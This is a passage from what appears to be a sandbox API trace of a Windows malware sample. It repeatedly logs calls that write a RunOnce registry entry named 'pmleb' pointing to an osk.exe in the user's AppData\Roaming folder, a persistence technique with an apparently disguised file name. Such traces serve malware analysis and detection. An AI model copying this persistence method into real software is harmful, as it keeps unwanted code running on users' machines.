lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.352] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.352] RegCloseKey (hKey=0x280) returned 0x0 [0096.352] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.352] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.353] SetTimer (hWnd=0x20280, nIDEvent=0x2294, uElapse=0xa, lpTimerFunc=0x0) returned 0x2294 [0096.353] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.367] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.367] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.367] KillTimer (hWnd=0x20280, uIDEvent=0x2294) returned 1 [0096.367] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.368] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.368] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.368] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.368] RegCloseKey (hKey=0x280) returned 0x0 [0096.368] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.368] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.369] SetTimer (hWnd=0x20280, nIDEvent=0x2295, uElapse=0xa, lpTimerFunc=0x0) returned 0x2295 [0096.369] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.382] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.382] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.383] KillTimer (hWnd=0x20280, uIDEvent=0x2295) returned 1 [0096.383] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.383] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.383] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.384] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.384] RegCloseKey (hKey=0x280) returned 0x0 [0096.384] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.384] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.384] SetTimer (hWnd=0x20280, nIDEvent=0x2296, uElapse=0xa, lpTimerFunc=0x0) returned 0x2296 [0096.384] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.398] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.398] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.398] KillTimer (hWnd=0x20280, uIDEvent=0x2296) returned 1 [0096.398] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.399] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.399] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.399] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.399] RegCloseKey (hKey=0x280) returned 0x0 [0096.399] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.399] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.400] SetTimer (hWnd=0x20280, nIDEvent=0x2297, uElapse=0xa, lpTimerFunc=0x0) returned 0x2297 [0096.400] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.414] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.414] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.414] KillTimer (hWnd=0x20280, uIDEvent=0x2297) returned 1 [0096.414] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.415] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.415] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.415] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.415] RegCloseKey (hKey=0x280) returned 0x0 [0096.415] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.415] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.415] SetTimer (hWnd=0x20280, nIDEvent=0x2298, uElapse=0xa, lpTimerFunc=0x0) returned 0x2298 [0096.416] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.429] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.429] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.429] KillTimer (hWnd=0x20280, uIDEvent=0x2298) returned 1 [0096.430] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.430] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.430] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.430] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.431] RegCloseKey (hKey=0x280) returned 0x0 [0096.431] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.431] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.431] SetTimer (hWnd=0x20280, nIDEvent=0x2299, uElapse=0xa, lpTimerFunc=0x0) returned 0x2299 [0096.431] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.445] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.445] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.445] KillTimer (hWnd=0x20280, uIDEvent=0x2299) returned 1 [0096.445] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.445] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.445] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.446] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.446] RegCloseKey (hKey=0x280) returned 0x0 [0096.446] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.446] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.446] SetTimer (hWnd=0x20280, nIDEvent=0x229a, uElapse=0xa, lpTimerFunc=0x0) returned 0x229a [0096.446] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.460] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.460] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.461] KillTimer (hWnd=0x20280, uIDEvent=0x229a) returned 1 [0096.461] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.461] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.461] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.462] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.462] RegCloseKey (hKey=0x280) returned 0x0 [0096.462] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.462] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.462] SetTimer (hWnd=0x20280, nIDEvent=0x229b, uElapse=0xa, lpTimerFunc=0x0) returned 0x229b [0096.462] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.476] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.476] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.476] KillTimer (hWnd=0x20280, uIDEvent=0x229b) returned 1 [0096.477] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.477] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.477] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.477] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.477] RegCloseKey (hKey=0x280) returned 0x0 [0096.478] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.478] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.478] SetTimer (hWnd=0x20280, nIDEvent=0x229c, uElapse=0xa, lpTimerFunc=0x0) returned 0x229c [0096.478] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.491] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.491] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.492] KillTimer (hWnd=0x20280, uIDEvent=0x229c) returned 1 [0096.492] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.492] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.492] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.493] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.493] RegCloseKey (hKey=0x280) returned 0x0 [0096.493] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.493] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.493] SetTimer (hWnd=0x20280, nIDEvent=0x229d, uElapse=0xa, lpTimerFunc=0x0) returned 0x229d [0096.493] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.517] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.517] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.518] KillTimer (hWnd=0x20280, uIDEvent=0x229d) returned 1 [0096.518] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.518] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.519] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.519] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.519] RegCloseKey (hKey=0x280) returned 0x0 [0096.519] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.519] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.519] SetTimer (hWnd=0x20280, nIDEvent=0x229e, uElapse=0xa, lpTimerFunc=0x0) returned 0x229e [0096.519] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.523] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.523] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.523] KillTimer (hWnd=0x20280, uIDEvent=0x229e) returned 1 [0096.523] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.523] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.523] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.524] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.524] RegCloseKey (hKey=0x280) returned 0x0 [0096.524] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.524] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.524] SetTimer (hWnd=0x20280, nIDEvent=0x229f, uElapse=0xa, lpTimerFunc=0x0) returned 0x229f [0096.524] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.538] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.538] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.539] KillTimer (hWnd=0x20280, uIDEvent=0x229f) returned 1 [0096.539] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.539] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.539] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.540] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.540] RegCloseKey (hKey=0x280) returned 0x0 [0096.540] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.540] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.540] SetTimer (hWnd=0x20280, nIDEvent=0x22a0, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a0 [0096.540] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.554] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.554] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.554] KillTimer (hWnd=0x20280, uIDEvent=0x22a0) returned 1 [0096.554] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.555] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.555] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.555] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.555] RegCloseKey (hKey=0x280) returned 0x0 [0096.556] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.556] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.556] SetTimer (hWnd=0x20280, nIDEvent=0x22a1, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a1 [0096.556] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.569] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.569] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.570] KillTimer (hWnd=0x20280, uIDEvent=0x22a1) returned 1 [0096.570] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.571] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.571] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.571] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.571] RegCloseKey (hKey=0x280) returned 0x0 [0096.571] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.571] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.571] SetTimer (hWnd=0x20280, nIDEvent=0x22a2, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a2 [0096.572] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.585] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.585] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.585] KillTimer (hWnd=0x20280, uIDEvent=0x22a2) returned 1 [0096.586] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.586] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.586] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.586] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.587] RegCloseKey (hKey=0x280) returned 0x0 [0096.587] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.587] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.587] SetTimer (hWnd=0x20280, nIDEvent=0x22a3, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a3 [0096.587] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.601] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.601] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.601] KillTimer (hWnd=0x20280, uIDEvent=0x22a3) returned 1 [0096.601] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.601] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.602] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.602] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.602] RegCloseKey (hKey=0x280) returned 0x0 [0096.602] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.602] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.602] SetTimer (hWnd=0x20280, nIDEvent=0x22a4, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a4 [0096.602] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.618] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.618] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.618] KillTimer (hWnd=0x20280, uIDEvent=0x22a4) returned 1 [0096.618] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.619] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.619] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.619] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.619] RegCloseKey (hKey=0x280) returned 0x0 [0096.619] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.619] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.620] SetTimer (hWnd=0x20280, nIDEvent=0x22a5, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a5 [0096.620] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.634] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.634] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.634] KillTimer (hWnd=0x20280, uIDEvent=0x22a5) returned 1 [0096.634] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.635] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.635] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.635] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.635] RegCloseKey (hKey=0x280) returned 0x0 [0096.635] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.635] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.635] SetTimer (hWnd=0x20280, nIDEvent=0x22a6, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a6 [0096.636] GetMessageW (in: lpMsg=0x33f7fc, 